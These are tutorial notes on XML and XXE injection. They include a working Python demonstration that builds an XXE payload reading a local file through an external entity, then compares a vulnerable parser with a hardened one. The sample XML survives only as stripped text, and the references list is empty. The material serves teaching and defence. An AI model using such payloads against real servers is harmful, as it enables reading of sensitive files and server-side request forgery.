XML eXternal Entity (XXE)
XML
XML stands for eXtensible Markup Language.
Some notes about XML:
- it was designed to store and transport data
- it stores data as plain text, which makes it a software- and hardware-independent way of storing, transporting and sharing data
- by itself it does nothing: it is just information wrapped in tags
- XML was designed to carry data (the focus is on what the data is), whereas HTML was designed to display data (the focus is on how the data looks)
- it has no predefined tags like HTML does; the tags are defined by the author of the document
An example of an XML file is (only the text content of the elements survives here; the tags themselves were lost in extraction):
Bruno Pala
XXE
Federico Loi
SQLI
Lorenzo Pisu
SSTI
XXE
XML eXternal Entity (XXE) injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It arises when the XML parser resolves external entities declared in a DTD supplied inside the attacker-controlled document.
XXE attacks can be used to:
- retrieve files from the server's filesystem
- perform SSRF (Server Side Request Forgery) attacks
- exfiltrate data out-of-band to a system that the attacker controls
- retrieve data via error messages
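The file-retrieval case above, as an added example that is not part of the original notes. It uses Python's xml.sax, whose expat-based reader resolves external general entities only when the feature_external_ges setting is on (that was the default before Python 3.7.1). The tag names (students, student, name, topic) are assumptions, since the page's XML sample survived only as text content; the "secret" file is created locally so the example runs offline.

```python
"""Added example: XXE file retrieval with xml.sax, vulnerable vs hardened parser.

Not code from the original notes. The element names are assumed, and the
target file is a constructed stand-in for something like /etc/passwd.
"""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler


class NameCollector(xml.sax.handler.ContentHandler):
    """Collects the text of every <name> element, where the entity is referenced."""

    def __init__(self):
        super().__init__()
        self.names = []
        self._buf = None

    def startElement(self, tag, attrs):
        if tag == "name":
            self._buf = []

    def characters(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def endElement(self, tag):
        if tag == "name":
            self.names.append("".join(self._buf))
            self._buf = None


def parse_names(xml_bytes, resolve_external_entities):
    """Parse the document and return the text of each <name>.

    resolve_external_entities=True mirrors an application that enabled external
    general entities (or a Python older than 3.7.1, where that was the default).
    False is the hardened setting: the entity reference expands to nothing.
    """
    handler = NameCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.names


def build_payload(target_path):
    """Attacker-controlled document: the internal DTD declares an external entity
    pointing at a local file, and the entity is referenced where a name is expected."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE students [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        ']>\n'
        '<students>\n'
        '  <student><name>&xxe;</name><topic>XXE</topic></student>\n'
        '  <student><name>Federico Loi</name><topic>SQLI</topic></student>\n'
        '</students>\n'
    ).encode()


def demo():
    """Return (names seen by the vulnerable parser, names seen by the hardened one)."""
    # Constructed stand-in for a sensitive file; one line of /etc/passwd-like text.
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")
    try:
        payload = build_payload(path)
        vulnerable = parse_names(payload, resolve_external_entities=True)
        hardened = parse_names(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return vulnerable, hardened


if __name__ == "__main__":
    vuln, safe = demo()
    print("vulnerable parser:", vuln)
    print("hardened parser:  ", safe)
```

The vulnerable parser hands the file contents back to the application as if they were the student's name; the hardened one returns an empty string in that position. The same resolver would open an http:// SYSTEM identifier with urllib, which is the SSRF variant listed above; the hardened setting blocks both, and a parser that rejects any DOCTYPE at all is the stronger choice when the application never needs one.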
Some references: